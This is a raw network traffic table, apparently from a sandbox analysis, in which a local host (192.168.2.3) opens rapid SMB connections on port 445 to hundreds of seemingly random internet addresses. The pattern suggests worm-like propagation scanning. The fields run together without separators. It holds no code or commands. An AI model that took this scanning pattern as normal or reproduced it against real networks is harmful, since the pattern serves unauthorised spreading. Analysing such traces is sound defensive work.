                                                                                            Dec 22, 2022 10:07:41.493392944 CET56911445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:41.590841055 CET58008445192.168.2.389.180.247.73
                                                                                            Dec 22, 2022 10:07:41.621257067 CET58010445192.168.2.3193.170.116.128
                                                                                            Dec 22, 2022 10:07:41.621917963 CET58016445192.168.2.3207.243.15.79
                                                                                            Dec 22, 2022 10:07:41.622229099 CET58018445192.168.2.3196.14.0.131
                                                                                            Dec 22, 2022 10:07:41.623083115 CET58020445192.168.2.3115.10.251.128
                                                                                            Dec 22, 2022 10:07:41.623975992 CET58029445192.168.2.3186.52.180.185
                                                                                            Dec 22, 2022 10:07:41.624286890 CET58032445192.168.2.315.43.112.1
                                                                                            Dec 22, 2022 10:07:41.624974966 CET58039445192.168.2.396.215.131.139
                                                                                            Dec 22, 2022 10:07:41.626735926 CET58060445192.168.2.314.204.173.223
                                                                                            Dec 22, 2022 10:07:41.626863003 CET58061445192.168.2.3221.69.157.69
                                                                                            Dec 22, 2022 10:07:41.627070904 CET58063445192.168.2.3166.129.22.113
                                                                                            Dec 22, 2022 10:07:41.627319098 CET58065445192.168.2.3147.222.75.252
                                                                                            Dec 22, 2022 10:07:41.627428055 CET58066445192.168.2.323.128.99.92
                                                                                            Dec 22, 2022 10:07:41.627547979 CET58067445192.168.2.353.44.108.146
                                                                                            Dec 22, 2022 10:07:41.627655029 CET58068445192.168.2.3196.71.241.247
                                                                                            Dec 22, 2022 10:07:41.627784014 CET58069445192.168.2.366.41.241.175
                                                                                            Dec 22, 2022 10:07:41.627911091 CET58070445192.168.2.359.73.251.32
                                                                                            Dec 22, 2022 10:07:41.628634930 CET58078445192.168.2.322.177.143.148
                                                                                            Dec 22, 2022 10:07:41.628947020 CET58081445192.168.2.3101.58.242.113
                                                                                            Dec 22, 2022 10:07:41.629072905 CET58082445192.168.2.3194.234.238.40
                                                                                            Dec 22, 2022 10:07:41.629278898 CET58084445192.168.2.368.244.147.167
                                                                                            Dec 22, 2022 10:07:41.630039930 CET58087445192.168.2.3102.180.235.217
                                                                                            Dec 22, 2022 10:07:41.630623102 CET58088445192.168.2.3162.77.16.78
                                                                                            Dec 22, 2022 10:07:41.631203890 CET58089445192.168.2.31.71.242.69
                                                                                            Dec 22, 2022 10:07:41.632790089 CET58095445192.168.2.3114.184.195.28
                                                                                            Dec 22, 2022 10:07:41.633450031 CET58098445192.168.2.3147.0.200.174
                                                                                            Dec 22, 2022 10:07:41.633698940 CET58100445192.168.2.3104.19.68.210
                                                                                            Dec 22, 2022 10:07:41.876247883 CET44558029186.52.180.185192.168.2.3
                                                                                            Dec 22, 2022 10:07:42.540400982 CET58029445192.168.2.3186.52.180.185
                                                                                            Dec 22, 2022 10:07:42.587271929 CET57910445192.168.2.345.117.145.3
                                                                                            Dec 22, 2022 10:07:42.696649075 CET57178445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:42.792454004 CET44558029186.52.180.185192.168.2.3
                                                                                            Dec 22, 2022 10:07:42.834290028 CET58103445192.168.2.389.180.247.74
                                                                                            Dec 22, 2022 10:07:42.834882021 CET58106445192.168.2.37.156.34.249
                                                                                            Dec 22, 2022 10:07:43.040575981 CET57999445192.168.2.345.117.145.3
                                                                                            Dec 22, 2022 10:07:43.102953911 CET57176445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:43.790508032 CET57811445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:44.040508032 CET57772445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:44.517612934 CET58128445192.168.2.3151.240.241.80
                                                                                            Dec 22, 2022 10:07:44.518265009 CET58135445192.168.2.319.54.96.234
                                                                                            Dec 22, 2022 10:07:44.518523932 CET58138445192.168.2.3138.245.160.97
                                                                                            Dec 22, 2022 10:07:44.519818068 CET58147445192.168.2.3223.75.174.169
                                                                                            Dec 22, 2022 10:07:44.520057917 CET58149445192.168.2.3221.95.215.186
                                                                                            Dec 22, 2022 10:07:44.520345926 CET58151445192.168.2.345.92.75.53
                                                                                            Dec 22, 2022 10:07:44.520674944 CET58155445192.168.2.3217.152.159.251
                                                                                            Dec 22, 2022 10:07:44.520910978 CET58156445192.168.2.3113.170.158.104
                                                                                            Dec 22, 2022 10:07:44.520987034 CET58157445192.168.2.3207.195.83.215
                                                                                            Dec 22, 2022 10:07:44.521054029 CET58158445192.168.2.3176.191.1.97
                                                                                            Dec 22, 2022 10:07:44.521239996 CET58160445192.168.2.396.221.175.14
                                                                                            Dec 22, 2022 10:07:44.521384954 CET58162445192.168.2.3167.141.239.186
                                                                                            Dec 22, 2022 10:07:44.521488905 CET58163445192.168.2.323.86.103.68
                                                                                            Dec 22, 2022 10:07:44.521680117 CET58164445192.168.2.3178.11.100.207
                                                                                            Dec 22, 2022 10:07:44.521861076 CET58166445192.168.2.3185.205.181.114
                                                                                            Dec 22, 2022 10:07:44.522614956 CET58169445192.168.2.395.253.20.43
                                                                                            Dec 22, 2022 10:07:44.523597956 CET58175445192.168.2.394.66.42.54
                                                                                            Dec 22, 2022 10:07:44.524162054 CET58176445192.168.2.3158.203.237.11
                                                                                            Dec 22, 2022 10:07:44.524792910 CET58177445192.168.2.387.87.220.24
                                                                                            Dec 22, 2022 10:07:44.552455902 CET58180445192.168.2.3187.82.34.234
                                                                                            Dec 22, 2022 10:07:44.706984043 CET58182445192.168.2.3185.123.192.195
                                                                                            Dec 22, 2022 10:07:44.707113028 CET58183445192.168.2.3198.179.97.38
                                                                                            Dec 22, 2022 10:07:44.707561970 CET58186445192.168.2.3104.216.19.9
                                                                                            Dec 22, 2022 10:07:44.708153009 CET58194445192.168.2.3205.22.11.119
                                                                                            Dec 22, 2022 10:07:44.708252907 CET58195445192.168.2.3201.81.56.181
                                                                                            Dec 22, 2022 10:07:44.708682060 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:44.708857059 CET58198445192.168.2.389.180.247.75
                                                                                            Dec 22, 2022 10:07:44.709219933 CET58201445192.168.2.3139.152.139.162
                                                                                            Dec 22, 2022 10:07:44.860761881 CET44558197155.100.73.6192.168.2.3
                                                                                            Dec 22, 2022 10:07:44.860980034 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:45.040620089 CET56390445192.168.2.3201.187.138.1
                                                                                            Dec 22, 2022 10:07:45.171596050 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:45.399282932 CET44558204201.187.138.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:45.399482965 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:45.400002956 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:45.404639006 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:45.620903015 CET58220445192.168.2.3143.106.129.113
                                                                                            Dec 22, 2022 10:07:45.621814013 CET58227445192.168.2.3216.239.194.253
                                                                                            Dec 22, 2022 10:07:45.622307062 CET58230445192.168.2.3140.97.187.23
                                                                                            Dec 22, 2022 10:07:45.624002934 CET58239445192.168.2.3115.244.103.152
                                                                                            Dec 22, 2022 10:07:45.624483109 CET58241445192.168.2.3210.147.204.12
                                                                                            Dec 22, 2022 10:07:45.624708891 CET58243445192.168.2.335.216.181.25
                                                                                            Dec 22, 2022 10:07:45.625283003 CET58247445192.168.2.3104.117.102.95
                                                                                            Dec 22, 2022 10:07:45.625488997 CET58248445192.168.2.3215.25.14.246
                                                                                            Dec 22, 2022 10:07:45.625724077 CET58249445192.168.2.3171.41.160.194
                                                                                            Dec 22, 2022 10:07:45.626043081 CET58250445192.168.2.3210.0.16.176
                                                                                            Dec 22, 2022 10:07:45.626585960 CET58252445192.168.2.3215.45.130.242
                                                                                            Dec 22, 2022 10:07:45.626940966 CET58254445192.168.2.38.47.175.39
                                                                                            Dec 22, 2022 10:07:45.627196074 CET58255445192.168.2.325.151.185.143
                                                                                            Dec 22, 2022 10:07:45.627342939 CET58256445192.168.2.3118.87.14.91
                                                                                            Dec 22, 2022 10:07:45.627791882 CET58258445192.168.2.34.55.85.3
                                                                                            Dec 22, 2022 10:07:45.629468918 CET58261445192.168.2.3136.183.99.32
                                                                                            Dec 22, 2022 10:07:45.631108046 CET58267445192.168.2.3206.44.85.138
                                                                                            Dec 22, 2022 10:07:45.631763935 CET58268445192.168.2.3100.7.253.75
                                                                                            Dec 22, 2022 10:07:45.642412901 CET44558205201.187.138.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:45.642541885 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:45.678580999 CET58277445192.168.2.382.7.204.126
                                                                                            Dec 22, 2022 10:07:45.678678989 CET58279445192.168.2.360.227.222.212
                                                                                            Dec 22, 2022 10:07:45.779865026 CET58280445192.168.2.389.180.247.76
                                                                                            Dec 22, 2022 10:07:45.823282957 CET58282445192.168.2.3150.46.30.0
                                                                                            Dec 22, 2022 10:07:45.824135065 CET58286445192.168.2.3179.127.75.254
                                                                                            Dec 22, 2022 10:07:45.824315071 CET58287445192.168.2.381.173.119.254
                                                                                            Dec 22, 2022 10:07:45.825412989 CET58295445192.168.2.3169.99.31.151
                                                                                            Dec 22, 2022 10:07:45.825953960 CET58298445192.168.2.3219.111.31.108
                                                                                            Dec 22, 2022 10:07:45.826181889 CET58300445192.168.2.377.199.236.91
                                                                                            Dec 22, 2022 10:07:45.838344097 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:45.900015116 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:45.967652082 CET44558302155.3.241.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:45.967814922 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:46.049052954 CET44558286179.127.75.254192.168.2.3
                                                                                            Dec 22, 2022 10:07:46.049175024 CET58286445192.168.2.3179.127.75.254
                                                                                            Dec 22, 2022 10:07:46.049223900 CET58286445192.168.2.3179.127.75.254
                                                                                            Dec 22, 2022 10:07:46.049535036 CET58303445192.168.2.3179.127.75.1
                                                                                            Dec 22, 2022 10:07:46.228226900 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:46.274223089 CET44558286179.127.75.254192.168.2.3
                                                                                            Dec 22, 2022 10:07:46.274369955 CET58286445192.168.2.3179.127.75.254
                                                                                            Dec 22, 2022 10:07:46.276772022 CET44558303179.127.75.1192.168.2.3
                                                                                            Dec 22, 2022 10:07:46.323343992 CET57910445192.168.2.345.117.145.3
                                                                                            Dec 22, 2022 10:07:46.493889093 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:46.497438908 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:46.743208885 CET58305445192.168.2.352.224.3.248
                                                                                            Dec 22, 2022 10:07:46.743671894 CET58309445192.168.2.3192.202.237.51
                                                                                            Dec 22, 2022 10:07:46.744199038 CET58310445192.168.2.39.176.211.44
                                                                                            Dec 22, 2022 10:07:46.744491100 CET58312445192.168.2.366.54.76.209
                                                                                            Dec 22, 2022 10:07:46.745134115 CET58321445192.168.2.3222.177.25.137
                                                                                            Dec 22, 2022 10:07:46.745546103 CET58324445192.168.2.3125.219.84.140
                                                                                            Dec 22, 2022 10:07:46.745898962 CET58330445192.168.2.322.159.0.82
                                                                                            Dec 22, 2022 10:07:46.748130083 CET58360445192.168.2.3102.219.114.13
                                                                                            Dec 22, 2022 10:07:46.748202085 CET58361445192.168.2.3125.113.7.250
                                                                                            Dec 22, 2022 10:07:46.748380899 CET58363445192.168.2.3202.164.126.3
                                                                                            Dec 22, 2022 10:07:46.748446941 CET58364445192.168.2.326.247.34.231
                                                                                            Dec 22, 2022 10:07:46.748867035 CET58367445192.168.2.371.24.0.82
                                                                                            Dec 22, 2022 10:07:46.749025106 CET58369445192.168.2.3215.166.45.210
                                                                                            Dec 22, 2022 10:07:46.749111891 CET58370445192.168.2.382.129.176.78
                                                                                            Dec 22, 2022 10:07:46.750458002 CET58371445192.168.2.335.139.219.247
                                                                                            Dec 22, 2022 10:07:46.750524044 CET58372445192.168.2.380.57.154.218
                                                                                            Dec 22, 2022 10:07:46.750571966 CET58373445192.168.2.3155.160.88.116
                                                                                            Dec 22, 2022 10:07:46.783132076 CET58377445192.168.2.396.135.217.77
                                                                                            Dec 22, 2022 10:07:46.794521093 CET58378445192.168.2.328.125.241.200
                                                                                            Dec 22, 2022 10:07:46.855875015 CET58379445192.168.2.389.180.247.77
                                                                                            Dec 22, 2022 10:07:46.900110006 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:46.900283098 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:46.931349039 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:46.931365967 CET58303445192.168.2.3179.127.75.1
                                                                                            Dec 22, 2022 10:07:46.947617054 CET58381445192.168.2.383.245.57.74
                                                                                            Dec 22, 2022 10:07:46.947736025 CET58382445192.168.2.392.73.227.111
                                                                                            Dec 22, 2022 10:07:46.947956085 CET58384445192.168.2.3164.69.146.64
                                                                                            Dec 22, 2022 10:07:46.948332071 CET58388445192.168.2.372.152.29.164
                                                                                            Dec 22, 2022 10:07:46.949093103 CET58396445192.168.2.3220.251.122.57
                                                                                            Dec 22, 2022 10:07:47.103247881 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:47.131074905 CET58400445192.168.2.3179.127.75.2
                                                                                            Dec 22, 2022 10:07:47.158536911 CET44558303179.127.75.1192.168.2.3
                                                                                            Dec 22, 2022 10:07:47.356251001 CET44558400179.127.75.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:47.790823936 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:47.839277029 CET58403445192.168.2.355.232.29.140
                                                                                            Dec 22, 2022 10:07:47.839723110 CET58406445192.168.2.3175.242.185.138
                                                                                            Dec 22, 2022 10:07:47.855004072 CET58423445192.168.2.3195.235.86.79
                                                                                            Dec 22, 2022 10:07:47.855175972 CET58425445192.168.2.38.232.247.252
                                                                                            Dec 22, 2022 10:07:47.855283022 CET58426445192.168.2.334.121.133.203
                                                                                            Dec 22, 2022 10:07:47.855423927 CET58428445192.168.2.344.204.136.234
                                                                                            Dec 22, 2022 10:07:47.855555058 CET58430445192.168.2.31.155.107.137
                                                                                            Dec 22, 2022 10:07:47.855689049 CET58432445192.168.2.323.242.154.127
                                                                                            Dec 22, 2022 10:07:47.855854034 CET58434445192.168.2.354.186.214.102
                                                                                            Dec 22, 2022 10:07:47.855864048 CET58433445192.168.2.3133.250.138.232
                                                                                            Dec 22, 2022 10:07:47.856267929 CET58437445192.168.2.3152.62.203.218
                                                                                            Dec 22, 2022 10:07:47.856703043 CET58446445192.168.2.3197.127.55.80
                                                                                            Dec 22, 2022 10:07:47.856952906 CET58449445192.168.2.310.195.205.237
                                                                                            Dec 22, 2022 10:07:47.857319117 CET58455445192.168.2.331.168.3.60
                                                                                            Dec 22, 2022 10:07:47.859648943 CET58468445192.168.2.3196.54.204.173
                                                                                            Dec 22, 2022 10:07:47.859776020 CET58470445192.168.2.3209.36.13.178
                                                                                            Dec 22, 2022 10:07:47.859788895 CET58469445192.168.2.370.112.74.223
                                                                                            Dec 22, 2022 10:07:47.859873056 CET58471445192.168.2.3172.237.41.115
                                                                                            Dec 22, 2022 10:07:47.885842085 CET58474445192.168.2.327.82.242.142
                                                                                            Dec 22, 2022 10:07:47.900178909 CET58400445192.168.2.3179.127.75.2
                                                                                            Dec 22, 2022 10:07:47.917138100 CET58475445192.168.2.39.86.136.19
                                                                                            Dec 22, 2022 10:07:47.917460918 CET58476445192.168.2.389.180.247.78
                                                                                            Dec 22, 2022 10:07:48.072844982 CET58479445192.168.2.3223.241.250.50
                                                                                            Dec 22, 2022 10:07:48.073007107 CET58480445192.168.2.3117.189.85.230
                                                                                            Dec 22, 2022 10:07:48.073236942 CET58481445192.168.2.3182.150.97.130
                                                                                            Dec 22, 2022 10:07:48.073445082 CET58483445192.168.2.3203.225.61.108
                                                                                            Dec 22, 2022 10:07:48.074727058 CET58494445192.168.2.3149.225.213.42
                                                                                            Dec 22, 2022 10:07:48.124859095 CET44558400179.127.75.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:48.197942972 CET58497445192.168.2.3179.127.75.3
                                                                                            Dec 22, 2022 10:07:48.423811913 CET44558497179.127.75.3192.168.2.3
                                                                                            Dec 22, 2022 10:07:48.431476116 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:48.603357077 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:48.790966988 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:48.931622982 CET58497445192.168.2.3179.127.75.3
                                                                                            Dec 22, 2022 10:07:48.964267015 CET58501445192.168.2.390.167.33.201
                                                                                            Dec 22, 2022 10:07:48.964525938 CET58507445192.168.2.3184.33.243.240
                                                                                            Dec 22, 2022 10:07:48.964884043 CET58510445192.168.2.344.90.68.1
                                                                                            Dec 22, 2022 10:07:48.966053963 CET58519445192.168.2.3191.164.199.62
                                                                                            Dec 22, 2022 10:07:48.966357946 CET58522445192.168.2.3206.126.16.51
                                                                                            Dec 22, 2022 10:07:48.966480970 CET58523445192.168.2.3179.72.199.6
                                                                                            Dec 22, 2022 10:07:48.966644049 CET58524445192.168.2.3181.113.73.221
                                                                                            Dec 22, 2022 10:07:48.966962099 CET58526445192.168.2.36.139.83.182
                                                                                            Dec 22, 2022 10:07:48.967118979 CET58528445192.168.2.380.6.205.169
                                                                                            Dec 22, 2022 10:07:48.967689991 CET58530445192.168.2.348.114.134.242
                                                                                            Dec 22, 2022 10:07:48.967694998 CET58531445192.168.2.322.203.23.217
                                                                                            Dec 22, 2022 10:07:48.967952967 CET58533445192.168.2.3221.89.111.195
                                                                                            Dec 22, 2022 10:07:48.969578981 CET58550445192.168.2.373.97.188.190
                                                                                            Dec 22, 2022 10:07:48.970155001 CET58553445192.168.2.345.87.171.56
                                                                                            Dec 22, 2022 10:07:48.971123934 CET58555445192.168.2.3178.221.7.62
                                                                                            Dec 22, 2022 10:07:48.972111940 CET58556445192.168.2.39.149.41.3
                                                                                            Dec 22, 2022 10:07:48.972767115 CET58557445192.168.2.337.133.53.100
                                                                                            Dec 22, 2022 10:07:48.973597050 CET58558445192.168.2.315.225.128.190
                                                                                            Dec 22, 2022 10:07:49.056574106 CET57999445192.168.2.345.117.145.3
                                                                                            Dec 22, 2022 10:07:49.064649105 CET58570445192.168.2.389.180.247.79
                                                                                            Dec 22, 2022 10:07:49.065850019 CET58571445192.168.2.3181.85.31.224
                                                                                            Dec 22, 2022 10:07:49.066550970 CET58574445192.168.2.3174.137.34.42
                                                                                            Dec 22, 2022 10:07:49.157238960 CET44558497179.127.75.3192.168.2.3
                                                                                            Dec 22, 2022 10:07:49.186177969 CET58577445192.168.2.3205.134.30.98
                                                                                            Dec 22, 2022 10:07:49.186312914 CET58578445192.168.2.335.97.81.41
                                                                                            Dec 22, 2022 10:07:49.186438084 CET58579445192.168.2.3183.79.163.121
                                                                                            Dec 22, 2022 10:07:49.186712980 CET58581445192.168.2.345.195.193.143
                                                                                            Dec 22, 2022 10:07:49.188224077 CET58592445192.168.2.3165.252.122.38
                                                                                            Dec 22, 2022 10:07:49.261288881 CET58595445192.168.2.3179.127.75.4
                                                                                            Dec 22, 2022 10:07:49.400351048 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:49.489612103 CET44558595179.127.75.4192.168.2.3
                                                                                            Dec 22, 2022 10:07:50.041079998 CET58595445192.168.2.3179.127.75.4
                                                                                            Dec 22, 2022 10:07:50.074220896 CET58608445192.168.2.375.127.177.9
                                                                                            Dec 22, 2022 10:07:50.074592113 CET58612445192.168.2.328.110.137.86
                                                                                            Dec 22, 2022 10:07:50.075443983 CET58613445192.168.2.3147.90.132.26
                                                                                            Dec 22, 2022 10:07:50.076524973 CET58615445192.168.2.3160.127.134.144
                                                                                            Dec 22, 2022 10:07:50.077424049 CET58616445192.168.2.3166.180.191.70
                                                                                            Dec 22, 2022 10:07:50.078232050 CET58617445192.168.2.3159.163.187.35
                                                                                            Dec 22, 2022 10:07:50.079967976 CET58629445192.168.2.324.37.236.134
                                                                                            Dec 22, 2022 10:07:50.080785990 CET58636445192.168.2.3124.216.227.239
                                                                                            Dec 22, 2022 10:07:50.081264019 CET58639445192.168.2.326.112.43.157
                                                                                            Dec 22, 2022 10:07:50.082103014 CET58646445192.168.2.363.14.238.235
                                                                                            Dec 22, 2022 10:07:50.082842112 CET58651445192.168.2.3128.196.80.110
                                                                                            Dec 22, 2022 10:07:50.083040953 CET58652445192.168.2.3218.195.154.222
                                                                                            Dec 22, 2022 10:07:50.083195925 CET58653445192.168.2.3150.28.202.125
                                                                                            Dec 22, 2022 10:07:50.083411932 CET58655445192.168.2.387.211.93.96
                                                                                            Dec 22, 2022 10:07:50.083781958 CET58657445192.168.2.3105.226.74.161
                                                                                            Dec 22, 2022 10:07:50.083991051 CET58659445192.168.2.3190.41.86.36
                                                                                            Dec 22, 2022 10:07:50.084125042 CET58660445192.168.2.399.36.85.32
                                                                                            Dec 22, 2022 10:07:50.084402084 CET58661445192.168.2.312.86.89.226
                                                                                            Dec 22, 2022 10:07:50.103497028 CET57811445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:50.125972033 CET58668445192.168.2.389.180.247.80
                                                                                            Dec 22, 2022 10:07:50.167773962 CET58669445192.168.2.3193.148.45.66
                                                                                            Dec 22, 2022 10:07:50.168567896 CET58672445192.168.2.3146.243.89.15
                                                                                            Dec 22, 2022 10:07:50.269128084 CET44558595179.127.75.4192.168.2.3
                                                                                            Dec 22, 2022 10:07:50.307816029 CET58675445192.168.2.392.217.78.194
                                                                                            Dec 22, 2022 10:07:50.308187962 CET58676445192.168.2.3171.172.252.197
                                                                                            Dec 22, 2022 10:07:50.308501005 CET58677445192.168.2.3139.223.44.26
                                                                                            Dec 22, 2022 10:07:50.308845997 CET58679445192.168.2.357.205.89.133
                                                                                            Dec 22, 2022 10:07:50.310743093 CET58691445192.168.2.3184.186.121.40
                                                                                            Dec 22, 2022 10:07:50.324501991 CET58693445192.168.2.3179.127.75.5
                                                                                            Dec 22, 2022 10:07:50.552783966 CET44558693179.127.75.5192.168.2.3
                                                                                            Dec 22, 2022 10:07:50.634864092 CET57772445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:51.056859016 CET58693445192.168.2.3179.127.75.5
                                                                                            Dec 22, 2022 10:07:51.166059971 CET58204445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:51.201742887 CET58708445192.168.2.3199.194.80.111
                                                                                            Dec 22, 2022 10:07:51.204612970 CET58715445192.168.2.338.198.117.61
                                                                                            Dec 22, 2022 10:07:51.205220938 CET58718445192.168.2.3201.182.245.66
                                                                                            Dec 22, 2022 10:07:51.206124067 CET58725445192.168.2.391.167.20.230
                                                                                            Dec 22, 2022 10:07:51.206775904 CET58730445192.168.2.3194.135.62.203
                                                                                            Dec 22, 2022 10:07:51.207009077 CET58731445192.168.2.3143.86.60.51
                                                                                            Dec 22, 2022 10:07:51.207142115 CET58732445192.168.2.3216.94.245.136
                                                                                            Dec 22, 2022 10:07:51.207627058 CET58734445192.168.2.33.170.6.76
                                                                                            Dec 22, 2022 10:07:51.207895994 CET58736445192.168.2.3200.124.71.203
                                                                                            Dec 22, 2022 10:07:51.208147049 CET58738445192.168.2.364.193.244.215
                                                                                            Dec 22, 2022 10:07:51.208493948 CET58739445192.168.2.3144.70.175.197
                                                                                            Dec 22, 2022 10:07:51.208667040 CET58740445192.168.2.3143.123.172.27
                                                                                            Dec 22, 2022 10:07:51.209599972 CET58747445192.168.2.389.180.247.81
                                                                                            Dec 22, 2022 10:07:51.210216999 CET58751445192.168.2.312.199.123.51
                                                                                            Dec 22, 2022 10:07:51.211046934 CET58752445192.168.2.332.181.5.11
                                                                                            Dec 22, 2022 10:07:51.212028980 CET58754445192.168.2.3124.131.88.24
                                                                                            Dec 22, 2022 10:07:51.212829113 CET58755445192.168.2.3202.239.135.32
                                                                                            Dec 22, 2022 10:07:51.215326071 CET58756445192.168.2.3102.151.136.142
                                                                                            Dec 22, 2022 10:07:51.216887951 CET58767445192.168.2.3104.207.160.58
                                                                                            Dec 22, 2022 10:07:51.259938002 CET44558730194.135.62.203192.168.2.3
                                                                                            Dec 22, 2022 10:07:51.284919024 CET44558693179.127.75.5192.168.2.3
                                                                                            Dec 22, 2022 10:07:51.292393923 CET58768445192.168.2.3102.173.169.133
                                                                                            Dec 22, 2022 10:07:51.293119907 CET58771445192.168.2.324.63.12.133
                                                                                            Dec 22, 2022 10:07:51.357336044 CET44558736200.124.71.203192.168.2.3
                                                                                            Dec 22, 2022 10:07:51.400481939 CET58205445192.168.2.3201.187.138.2
                                                                                            Dec 22, 2022 10:07:51.402715921 CET58772445192.168.2.3179.127.75.6
                                                                                            Dec 22, 2022 10:07:51.460736036 CET58775445192.168.2.3125.110.125.16
                                                                                            Dec 22, 2022 10:07:51.460840940 CET58776445192.168.2.346.24.121.1
                                                                                            Dec 22, 2022 10:07:51.460944891 CET58777445192.168.2.3138.50.21.226
                                                                                            Dec 22, 2022 10:07:51.461272001 CET58779445192.168.2.3214.73.136.114
                                                                                            Dec 22, 2022 10:07:51.462270975 CET58791445192.168.2.3192.248.243.52
                                                                                            Dec 22, 2022 10:07:51.777543068 CET58730445192.168.2.3194.135.62.203
                                                                                            Dec 22, 2022 10:07:51.869287014 CET58736445192.168.2.3200.124.71.203
                                                                                            Dec 22, 2022 10:07:52.018259048 CET44558736200.124.71.203192.168.2.3
                                                                                            Dec 22, 2022 10:07:52.261147976 CET58795445192.168.2.389.180.247.82
                                                                                            Dec 22, 2022 10:07:52.308321953 CET58798445192.168.2.3196.30.212.36
                                                                                            Dec 22, 2022 10:07:52.308377981 CET58800445192.168.2.3223.63.185.38
                                                                                            Dec 22, 2022 10:07:52.308551073 CET58801445192.168.2.3134.129.79.139
                                                                                            Dec 22, 2022 10:07:52.308707952 CET58802445192.168.2.3131.203.157.89
                                                                                            Dec 22, 2022 10:07:52.309544086 CET58812445192.168.2.387.70.249.226
                                                                                            Dec 22, 2022 10:07:52.310281038 CET58813445192.168.2.352.78.104.201
                                                                                            Dec 22, 2022 10:07:52.311461926 CET58815445192.168.2.377.36.184.220
                                                                                            Dec 22, 2022 10:07:52.312578917 CET58825445192.168.2.351.100.78.241
                                                                                            Dec 22, 2022 10:07:52.313685894 CET58832445192.168.2.335.79.150.152
                                                                                            Dec 22, 2022 10:07:52.313962936 CET58835445192.168.2.328.121.144.220
                                                                                            Dec 22, 2022 10:07:52.314874887 CET58842445192.168.2.389.174.94.224
                                                                                            Dec 22, 2022 10:07:52.315362930 CET58847445192.168.2.3223.212.105.168
                                                                                            Dec 22, 2022 10:07:52.315599918 CET58848445192.168.2.3168.55.175.23
                                                                                            Dec 22, 2022 10:07:52.315834999 CET58849445192.168.2.335.66.193.36
                                                                                            Dec 22, 2022 10:07:52.316063881 CET58851445192.168.2.383.228.107.201
                                                                                            Dec 22, 2022 10:07:52.330559969 CET58854445192.168.2.3112.58.142.90
                                                                                            Dec 22, 2022 10:07:52.331836939 CET58865445192.168.2.3197.217.250.117
                                                                                            Dec 22, 2022 10:07:52.332468987 CET58866445192.168.2.3144.214.75.247
                                                                                            Dec 22, 2022 10:07:52.369339943 CET58197445192.168.2.3155.100.73.6
                                                                                            Dec 22, 2022 10:07:52.416906118 CET58867445192.168.2.3115.16.192.106
                                                                                            Dec 22, 2022 10:07:52.417855024 CET58870445192.168.2.3135.153.21.211
                                                                                            Dec 22, 2022 10:07:52.447489977 CET58302445192.168.2.3155.3.241.2
                                                                                            Dec 22, 2022 10:07:52.463716984 CET58871445192.168.2.3179.127.75.7
                                                                                            Dec 22, 2022 10:07:52.557759047 CET58874445192.168.2.3187.184.44.252
                                                                                            Dec 22, 2022 10:07:52.557872057 CET58875445192.168.2.384.187.60.174
                                                                                            Dec 22, 2022 10:07:52.557959080 CET58876445192.168.2.318.22.37.89
                                                                                            Dec 22, 2022 10:07:52.558049917 CET58877445192.168.2.363.145.42.172
                                                                                            Dec 22, 2022 10:07:52.558969021 CET58888445192.168.2.336.220.16.14
                                                                                            Dec 22, 2022 10:07:53.120012045 CET58894445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:53.248554945 CET4455889450.116.150.3192.168.2.3
                                                                                            Dec 22, 2022 10:07:53.248763084 CET58894445192.168.2.350.116.150.3
                                                                                            Dec 22, 2022 10:07:53.343269110 CET58896445192.168.2.389.180.247.83
                                                                                            Dec 22, 2022 10:07:53.433453083 CET58899445192.168.2.3175.30.120.243
                                                                                            Dec 22, 2022 10:07:53.433707952 CET58900445192.168.2.315.50.68.141
                                                                                            Dec 22, 2022 10:07:53.433939934 CET58901445192.168.2.382.38.113.189
                                                                                            Dec 22, 2022 10:07:53.434184074 CET58903445192.168.2.3203.248.176.39
                                                                                            Dec 22, 2022 10:07:53.435501099 CET58912445192.168.2.353.183.130.46
                                                                                            Dec 22, 2022 10:07:53.435610056 CET58915445192.168.2.3110.76.136.98
                                                                                            Dec 22, 2022 10:07:53.436824083 CET58922445192.168.2.3120.239.36.211
                                                                                            Dec 22, 2022 10:07:53.441184044 CET58931445192.168.2.3136.67.37.39
                                                                                            Dec 22, 2022 10:07:53.449345112 CET58936445192.168.2.3131.100.238.156
